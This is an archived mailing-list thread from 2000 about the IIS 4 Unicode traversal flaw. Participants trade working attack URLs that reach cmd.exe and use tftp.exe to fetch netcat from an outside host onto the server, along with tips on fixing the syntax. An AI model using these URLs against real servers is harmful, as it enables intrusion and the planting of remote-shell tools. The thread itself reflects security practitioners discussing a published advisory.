Vulnerability Development mailing list archives
Re: dos commands via iis 4 (TFTP)
From: booboo <booboo () 65535 COM>
Date: Tue, 14 Nov 2000 14:30:36 +0000
you can also normally swap the - with a / as in netstat+"-a" or netstat+/a BooBoo On Fri, 10 Nov 2000, Loschiavo, Dave wrote:
Thanks, looks like I inadvertantly left the "get" out of the message. I was including that in the URL when testing. However, what I did notice was the use of the quotes in the "-i" area of the URL. I was not using quotes. Will have to give that a shot. -thanks -----Original Message----- From: Robert A. Seace To: DLoschiavo () frcc cc ca us Cc: VULN-DEV () SECURITYFOCUS COM Sent: 11/10/00 10:11 AM Subject: Re: dos commands via iis 4 (TFTP) In the profound words of Loschiavo, Dave:I tried tftp commands in the URL, formatted like this:http://192/168.1.250/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system 32/cmd.exe?/tftp+-i+192.168.1.20+nc.exe" and got nowhere, while this:http://192.168.1.250/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system 32/cmd.exe?/c+dir+c: gave me a listing of the of the c: drive. Am I formatting the "TFTP" URL incorrectly?Yeah, I think so... But, I'm no TFTP guru, either... Personally, I would just use RCP... However, looking at the original advisory on BugTraq, that mentioned using TFTP ("http://www.securityfocus.com/archive/1/141048"), I think you need a "GET" before the "nc.exe", and maybe a destination location specified after it, for where to place it on the NT box... For instance, it shows an URL of: /[bin-dir]/..%c0%af../winnt/system32/tftp.exe+"-i"+xxx.xxx.xxx.xxx+GET+n cx99.exe+c:\winnt\system32\ncx99.exe
Current thread:
- Re: dos commands via iis 4 (TFTP), (continued)
- Re: dos commands via iis 4 (TFTP) Matt Zimmerman (Nov 16)
- Re: dos commands via iis 4 (TFTP) Bluefish (P.Magnusson) (Nov 16)
- Re: dos commands via iis 4 (TFTP) MadHat (Nov 16)
- Re: dos commands via iis 4 (TFTP)-NETBIOS booboo (Nov 16)
- Re: dos commands via iis 4 (TFTP)-NETBIOS MadHat (Nov 16)
- Re: dos commands via iis 4 (TFTP)-NETBIOS booboo (Nov 18)
- Re: dos commands via iis 4 (TFTP)-NETBIOS Paul Cardon (Nov 19)
- Re: dos commands via iis 4 (TFTP)-NETBIOS Illes Marci (Nov 21)
- Re: dos commands via iis 4 (TFTP)-NETBIOS Paul Cardon (Nov 22)
- Re: dos commands via iis 4 (TFTP) Lincoln Yeoh (Nov 16)
- Re: dos commands via iis 4 (TFTP) Robert A. Seace (Nov 11)